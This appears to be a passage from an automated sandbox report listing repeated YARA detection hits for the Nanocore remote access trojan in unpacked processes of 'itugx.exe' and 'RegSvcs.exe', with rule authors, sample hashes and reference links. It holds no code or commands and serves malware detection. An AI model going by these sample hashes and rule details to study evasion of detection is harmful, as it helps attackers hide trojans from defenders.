      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
